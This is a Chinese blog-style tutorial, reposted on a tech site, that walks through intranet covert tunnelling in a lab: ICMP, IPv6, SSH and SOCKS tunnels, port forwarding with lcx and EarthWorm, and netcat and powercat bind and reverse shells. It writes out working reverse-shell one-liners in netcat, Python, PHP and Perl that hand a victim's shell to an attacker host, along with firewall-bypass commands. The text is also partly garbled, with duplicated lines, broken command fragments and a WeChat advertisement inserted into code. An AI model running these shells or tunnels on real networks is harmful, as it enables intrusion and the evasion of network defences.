您当前的位置:首页 > 电脑百科 > 网络技术 > 网络安全

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

时间:2021-06-22 12:28:55  来源:  作者:网络安全—大炮乔

前言

前段时间读了读徐哥的《内网安全攻防》,并复现了部分知识点,写篇文章记录下学习内容。

何为隐藏通信隧道技术?

意义

当我们成功杀入内网并完成信息收集后,下一步要进行的就是判断内网的连通性(也就是各种各样的流量包能否出的去、进的来),隐藏通信隧道技术通常用于在访问受限的内网环境中完成内网之内、内网与公网之间安全、稳定的数据传输。

简介

在最简单的情况下,两台主机之间数据的交换建立在TCP/IP协议之上,也就是说知道了IP、建立了TCP连接,那么两台主机便可以进行数据传输。

但在大多数情况下,内网的环境存在多种边界设备以及入侵检测装置的限制,它们会对主机间或者内网与外网之间通信的流量进行检测,如果存在异常就会进行拦截,这无疑给内网渗透增加了难度,而隐藏通信隧道技术就是为了绕过各种边界设备的封锁,从而完成主机间或内网与外网之间的通信。

常见隧道

  • 网络层:IPV6隧道、ICMP隧道
  • 传输层:TCP隧道、UDP隧道、端口转发
  • 应用层:SSH隧道、HTTP(S)隧道、DNS隧道

接下来将从三种隧道中各选几种进行试验

网络层

1.IPV6隧道

  • 工具:6tunnel(kali自带)
  • 目标机:winserver 2008
  • 攻击机:kali

首先开启目标机上的IPV6(实战中这一步一般由渗透测试人员上传的软件开启)

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

查看目标机的IPV6地址

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在攻击机中运行

sudo su
6tunnel -4 80  fe80::6090:bbdf:8c09:68d6%eth0 80 
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的含义就是将目标机的80端口(目标机使用IPV6地址)转发到本机的80端口上(本机使用IPV4地址)

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

2.ICMP隧道

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

2.ICMP隧道

在一般的情况下,如果两台主机要进行通信,必须要开放相应的端口,比如ssh-22端口,rdp-3389端口,但如果使用ICMP隧道,则不需要开放任何的端口,所以ICMP隧道十分简单、实用

在渗透测试中,如果防火墙对各种上层协议(HTTP.HTTPS,DNS等)的数据包进行了封锁,那么我们可以尝试一下网管常常漏掉的ICMP协议包,我们可以将TCP数据包封装到ICMP数据包中,如果防火墙不对ICMP包进行拦截,那么我们便可以实现对防火墙的突破

  • 工具:icmpsh
  • 下载地址:https://gitee.com/WeiyiGeek/icmpshell.git(github下载太慢,就换了个国内的)
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

安装Python的impacket类库,以便于对各类协议进行访问

apt-get install python3-impacket
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

直接从github上下载源码并运行地址:

直接从github上下载源码并运行地址:

python setup.py install
+WX:machinegunjoe666 免费获取资料 免费获取资料
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

如此impacket便安装成功

由于icmpsh要代替系统本身的ping应答,所以要关闭一下系统的ping应答,否则工具将无法稳定运行

sysctl -w net.ipv4.icmp_echo_ignore_all=1
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

进入目录后运行

./run.sh
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

依次输入攻击机IP和受害机IP便会自动输出需要在受害机上运行的命令

在受害机运行

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在攻击机上便可以见到回弹shell

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

工具:pingtunnel

本次测试网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

测试环境:攻击机可以访问web服务器,不能访问数据库服务器

web服务器只能通过ICMP协议访问数据库服务器

渗透目标:利用工具使攻击机可以访问数据库服务器的3389

首先要安装工具

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz

tar -xzvf PingTunnel-0.72.tar.gz

cd PingTunnel

make && make install
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 

tar zxvf libpcap-1.9.0.tar.gz 

cd libpcap-1.9.0 

./configure
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 

tar zxvf libpcap-1.9.0.tar.gz 

cd libpcap-1.9.0 

./configure
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

最后一步过程中又会报Neither flex nor lex was found的错误:

install 
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

接下来还要在web服务器上安装工具,安装过程类似不多赘述

接下来还要在web服务器上安装工具,安装过程类似不多赘述

在web服务器运行命令

ptunnel -x haixian

一个密码为haixian的icmp隧道

接下来在攻击机上执行

ptunnel -p 192.168.1.5 -lp 1080 -da 192.168.1.2 -dp 3389 -x haixian
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

接下来访问本机的1080端口便可以连接到数据库服务器的远程桌面了(3389)

接下来访问本机的1080端口便可以连接到数据库服务器的远程桌面了(3389)

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

同理,我们可以连接数据库服务器的SSH(22端口)或者数据库服务(如果是MySQL的话为3306端口),这里不再赘述可以连接数据库服务器的SSH(22端口)或者数据库服务(如果是mysql的话为3306端口),这里不再赘述

传输层

1.端口转发

工具:lcx

下载地址:
http://www.vuln.cn/wp-content/uploads/2016/06/lcx_vuln.cn_.zip

lcx是一个非常经典的端口转发工具,在linux或者windows中均可使用,lcx的原理就是搭建Socket隧道,一个正常的Socket隧道必须具备两端:客户端、服务端,服务端开启监听端口,客户端传入服务端的IP与端口,主动与服务端连接

在受害机上执行

lcx.exe -slave 192.168.1.4(攻击机IP) 4444 127.0.0.1 3389
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思就是将本机的3389端口转发到攻击机的4444端口上

之后在攻击机上执行

./portmap -m 2 -p1 4444 -h2 192.168.1.4 -p2 5555
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思就是将本地4444端口接收的数据转发到5555端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在攻击机访问本机5555端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可见成功访问受害机远程桌面(3389端口)

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

2.netcat

kali上会自带这个工具,可以使用

nc -help
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

查看netcat的安装情况

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

-p 指定端口-v 显示细节-u 使用UDP传输协议-l 监听模式-w 设置超时时间
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

Banner抓取

这是一种在特定端口检索关于特定服务信息的技术,在渗透测试中常用于信息收集或者寻找漏洞

现在我们尝试抓取winserver 2008(192.168.1.2)3389端口的相关信息

nc -nv 192.168.1.2 3389
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

使用

nc -nvv 192.168.1.2 3389
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

尝试连接3389

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

端口扫描

扫描80端口

nc -v  192.168.1.2 80
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

获得shell

获得shell

(1).正向shell).正向shell

即攻击机主动去连接受害机,正向连接使用频率较少,因为这种shell很容易被各种边界设备所拦截

在受害机中执行

nc -lvp 4444 -e /bin/sh
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思是把/bin/sh发送给请求本机4444端口的终端

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

nc 192.168.1.5 444
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

去主动连接受害机的4444端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在攻击机上使用ifconfig查看IP发现已经是受害机的IP

(2).反向shell

即受害及主动来连接攻击机,这种方法在渗透测试中更为常用,因为它可以突破许多边界设备的封锁

在攻击机上执行

nc -lvp 5555
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

开始监听本机5555端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

接下来在受害机中执行

nc 192.168.1.4 5555 -e /bin/sh
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思就是去主动连接攻击机的5555端口并把/bin/sh传送给5555端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可以看到在攻击机上已经收到了受害机的shell

但这个实验是建立在受害机已经安装netcat这个工具了,而实际情况下如果没有安装应该怎么办呢?

1.使用python反弹shell

执行如下命令,在攻击机上监听本地1234端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在受害机中执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",攻击机监听的端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

攻击机上收到回弹shell

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

但是这种方法又建立在受害及上存在python环境的情况下

如果受害机上没有python环境怎么办呢?

2.php反弹shell

如果没有python环境,但受害机上存在php环境,那么也可以利用php反弹shell

执行如下命令,在攻击机上监听本地2021端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在受害机上执行

php -r '$sock=fsockopen("攻击机ip",攻击机监听的端口);exec("/bin/bash -i <&3 >&3 2>&3");'
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

那如果在受害机上既没有python环境又没有php环境该怎么办呢?ython环境又没有php环境该怎么办呢?

3.perl反弹shell

如果目标机器上使用的是perl语言,那么我们还可以使用perl反弹shell

攻击机本地监听4321端口

nc -lvp 4321
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

perl -e 'use Socket;$i="攻击机ip";$p=攻击机监听端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -e 'use Socket;$i="攻击机ip";$p=攻击机监听端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

实验工具:web服务器(kali)、数据库服务器(win server 2008)、攻击机(kali)

实验工具:web服务器(kali)、数据库服务器(win server 2008)、攻击机(kali)

本次实验网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

实验条件:攻击机可以访问到web服务器,但访问不到数据库服务器,web服务器可以访问攻击机,也可以访问数据库服务器,攻击机无法直接访问数据库服务器,通过前期渗透已经取得了web服务器的权限


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

nc -lvp 9999 -e c:windowssystem32cmd.exe
nc -lvp 9999 -e c:windowssystem32cmd.exe
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

将本机的cmd.exe传送到请求9999端口的主机

.1.4 9999 -c "nc -v 192.168.1.2 9999"
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思就是web服务器先去连接攻击机,连上之后立刻去连接数据库服务器的9999端口,连接成功后把两个隧道合并为一条隧道(请自行脑补~)

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

3.Powercat

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

3.Powercat

工具下载地址:
https://github.com/besimorhino/powercat

工具下载后需要导入powercat.ps1脚本后才可以正常使用powercat

执行

Import-Module .powercat.ps1
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

导入脚本,有可能会报权限不够,需要修改权限

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

执行

Set-ExecutionPolicy RemoteSigned
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

然后就可以导入脚本了

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

如图所示,接下来就可以正常的使用powercat了

powercat部分参数介绍

-c 指定一个ip地址
-p 指定一个端口
-v 显示详情
-l 监听模式
-e 程序重定向
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

通过nc正向连接powercat

在win server 2008中执行

powercat -l -p 8888 -e cmd.exe -v
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思是把cmd.exe数据包发送给请求本机8888端口的主机

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在攻击机中执行

nc 192.168.1.2 8888 -vv
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可以看到已经接收到了win server2008 的shell

使用nc反向连接powercat

在攻击机中执行

nc -l -p 5678 -vv
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

开启监听本机5678端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

接下来在win server2008执行

powercat -c 192.168.1.4 -p 5678 -v -e cmd.exe
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

主动去连接攻击机

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可以看到在攻击机中收到了反弹shell

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

powercat之间互相连接反弹powershell

首先在win server 2008上执行

powercat -l -p 3333 -v
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

监听本机3333端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

接下来在WIN7上执行

powercat -c 192.168.1.2 -p 3333 -v -ep
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可以看到在win server 2008上已经收到了来自WIN7的powershell

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

应用层

1.SSH

几乎所有的unix/linux主机都支持SSH协议,都可以通过SSH通信而在现实情况中,网管员经常会使用SSH连接来远程管理内网中的主机,所以一般情况下,边界设备并不会拦截SSH流量,加之SSH流量是加密的,一般的入侵检测工具很难检测出SSH流量的异常,所以渗透测试人员往往能通过SSH建立起一些其他隧道难以建立的TCP通信隧道

SSH常见参数

-C 压缩传输
-f 后台执行SSH
-N 建立静默连接
-g 允许远程主机连接本地用于转发的端口
-L 本地端口转发
-R 远程端口转发
-D 动态转发
-P 指定SSH端口
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

(1).本地转发

本次实验网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

实验环境:攻击机无法访问数据库服务器,可以访问web服务器且已获得web服务器的权限,web服务器和数据库服务器可以互相访问

实验目标:通过本地端口转发,访问攻击机本地的2021端口便可以打开数据库服务器的远程桌面

首先在攻击机上执行

ssh -CfNg -L 2021:192.168.1.2:3389 root@192.168.1.5
+WX:machinegunjoe666免费获取资料
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思就是攻击机去连接web服务器,连上之后由web服务器去连接数据库服务器的3389端口并把数据通过SSH通道传给攻击机

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

会提示输入web服务器的密码,输入密码

由于我们选择的是静默模式,所以可以本地查看一下2021端口是否被监听来检查通道的建立是否正常

netstat -tulnp | grep "2021"
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可以看到2021端口正在被ssh服务监听,证明通道搭建成功

接下来在攻击机访问把本地2021端口即可打开数据库服务器的远程桌面

rdesktop 127.0.0.1:2021
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

(2).远程转发

本次实验网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

实验环境:

攻击机无法访问数据库服务器,也无法访问web服务器但已获得web服务器的权限,web服务器和数据库服务器可以互相访问,web服务器可以访问具有公网IP的攻击机

实验目标:通过访问攻击机本机的7890端口来访问数据库服务器的3389端口

在web服务器上执行

ssh -CfNg -R 7890:192.168.1.2:3389 root@192.168.1.4
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这条命令的意思是此时的web服务器虽然依旧是跳板,但是无论是连接数据库服务器的3389还是去连接攻击机的7890都是web服务器主动发起

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

输入攻击机的密码

在攻击机访问本地7890端口

rdesktop 127.0.0.1:7890
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

(3).动态转发

本次实验网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

连接成功

ssh -CfNg -D 6000 root@192.168.1.5
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

此条命令搭建了一个动态的SOCKS代理通道

输入web服务器密码后执行

netstat -tulnp | grep ":6000"
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

查看连接情况

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

连接成功

例:在本地浏览器设置好SOCKS代理后可以访问到数据库服务器上开放的web服务

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

2.HTTP/HTTPS隧道

这种隧道笔者已经在文章
https://www.freebuf.com/articles/web/262820.html中已经讲解,这里不多赘述

3.SOCKS代理

SOCKS可以简单的把两个系统连接到一起,SOCKS支持多种协议,可以理解为升级版的lcx

常见工具:EarthWorm、SocksCap64、ProxyChains

(1).EW

工具下载地址:
https://github.com/rootkiter/EarthWorm

正向代理

攻击机本地执行

ew -s ssocksd -l 888
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

这种连接方式是攻击机主动去找受害机,所以这里的受害机需要具有公网IP(攻击机可以直接去访问受害机)

反向代理

本次实验网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

首先在攻击机上执行

./ew_for_linux64 -s rssocks -l 1080 -e 1234
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在本地添加转接隧道,将1080收到的数据转发给1234端口

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

在web服务器上执行

ew.exe -s rssocks -d 192.168.1.4 -e 1234
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

可在攻击机上收到回显

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

至此,socks代理隧道搭建成功,攻击机便可以通过此隧道访问受害机任意服务(服务开启)

二级网络环境试验1:

本次实验网络拓扑图:

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

实验环境

web服务器可以访问外网和数据库服务器,数据库服务器不能访问外网,只能访问内网资源

实验目标:通过访问攻击机本地端口访问架设在数据库服务器上的SOCKS隧道从而访问内网资源

首先在主机上执行

./ew_for_linux64 -s ssocksd -l 888
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

启动888端口的SOCKS代理

人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

然后在web服务器中执行

ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.1.4 -g 888
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 


人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)

 

使web服务器去主动连接攻击机和数据库服务器

接下来就可以通过访问攻击机的1080端口去使用搭建好的SOCKS隧道了

二级网络环境试验2:

本次实验网络拓扑图:

实验环境:

A主机没有公网IP但可以访问公网,不可以访问内网,B主机可以访问内网,不能访问外网

实验目标:

通过访问攻击机上的10800端口来访问B主机上的SOCKS隧道,从而访问内网资源

首先在攻击机上执行

./ew_for_linux64 -s lcx_listen -l 10800 -e 888
xxxxxxxxxxbr ./ew_for_linux64 -s lcx_listen -l 10800 -e 888br

添加转接隧道,将10800端口收到的代理请求转发到888端口

下面在B主机中执行

ew_for_Win.exe -s ssocksd -l 999
xxxxxxxxxxbr ew_for_Win.exe -s ssocksd -l 999br

开启999端口的SOCKS代理

最后,在A主机中执行

./ew_for_linux64 -s lcx_slave -d 192.168.1.4 -e 888 -f 192.168.1.2 -g 999
xxxxxxxxxxbr ./ew_for_linux64 -s lcx_slave -d 192.168.1.4 -e 888 -f 192.168.1.2 -g 999br

利用slave方式,将攻击机的888端口与B主机的999端口连接

可以在攻击机上看到隧道搭建成功提示

接下来可以使用SocksCap64等代理工具对socks隧道进行利用,方法较为简单,这里不再赘述

写在后面

这篇文章比较长,感谢读到最后的你~



Tags:渗透   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
公众号:白帽子左一 领取配套练手靶场、安全全套课程及工具...前言在日常渗透项目中,app渗透可以说是家常便饭了。但由于安卓7以后不信任用户安装的证书,很多时候无法正常抓取数...【详细内容】
2021-12-07  Tags: 渗透  点击:(31)  评论:(0)  加入收藏
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  Tags: 渗透  点击:(44)  评论:(0)  加入收藏
前言登场的目标虽不是SRC,但是整个漏洞的利用手法很有学习意义。目前在很多大厂的http数据包中都会添加sign值对数据包是否被篡改进行校验,而sign算法的破解往往是我们漏洞测...【详细内容】
2021-11-10  Tags: 渗透  点击:(91)  评论:(0)  加入收藏
一:信息收集阶段因为目标是学校,一般会去考虑收集学号,教工号。因为有的登陆点需要此类信息,且密码存在规律性(身份证后六位,123456)。目标域名xxx.com【查看资料】开始的时候,我是...【详细内容】
2021-10-27  Tags: 渗透  点击:(46)  评论:(0)  加入收藏
一、背景介绍Pikachu是一个带有各种漏洞的Web应用系统,这个系统是使用PHP搭建的,需要PHP环境和Mysql数据库支持。我们可以利用phpstudy在本地搭建这个渗透测试平台,如果你是一...【详细内容】
2021-10-09  Tags: 渗透  点击:(52)  评论:(0)  加入收藏
一、知识点详解msfconsole,进入msf控制端show options,查看设置的ip地址和端口号是否写入run,根据写入的ip地址和端口号,开启监听服务help,在进入安卓手机的控制端,查看可以使用的...【详细内容】
2021-10-08  Tags: 渗透  点击:(63)  评论:(0)  加入收藏
一、准备环境Burpsuite、夜神模拟器二、步骤运行burpsuite,打开代理后,访问 http://burp/ 下载CA证书点击右上角位置下载CA证书将下载的CA证书导入到浏览器中,打开浏览器选择设...【详细内容】
2021-10-08  Tags: 渗透  点击:(66)  评论:(0)  加入收藏
拓扑环境 Kali Linux(攻击机) Centos6.4(web服务器) win7(域成员主机无法上网) win2008R2(域控无法上网) 目的通过Kali Linux拿到域控权限2021最新整理网络安全\渗透测试/安全学习(全...【详细内容】
2021-09-17  Tags: 渗透  点击:(84)  评论:(0)  加入收藏
前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称,其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】
2021-09-06  Tags: 渗透  点击:(46)  评论:(0)  加入收藏
http 头部信息http头部信息经常包含着主机服务的一些版本信息,经常使用的字段信息有:Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】
2021-08-19  Tags: 渗透  点击:(225)  评论:(0)  加入收藏
▌简易百科推荐
一、背景介绍永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获...【详细内容】
2021-12-27  Kali与编程    Tags:勒索病毒   点击:(3)  评论:(0)  加入收藏
一、SQL注入漏洞SQL 注入攻击( SQL Injection ),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串...【详细内容】
2021-12-10  华清信安    Tags:Web漏洞   点击:(23)  评论:(0)  加入收藏
AD域是目前大型企业常用的内网管理方案,但随着近年来实网演习的常态化和不断深入,AD域安全越来越得到企业的重视。不论是在演练还是在真实的高级攻击场景中,在复盘中可以看出,大...【详细内容】
2021-10-27    中国信息安全  Tags:AD域   点击:(38)  评论:(0)  加入收藏
网友们,过去一年,您的网络安全段位提升了吗?需要更多的专属利器加持吗?今年我们又为您准备了丰富的网络安全知识大餐,助您驰骋网络,为网络安全护航!2021年10月11日至17日为“国家网...【详细内容】
2021-10-13    九派教育  Tags:网络安全   点击:(49)  评论:(0)  加入收藏
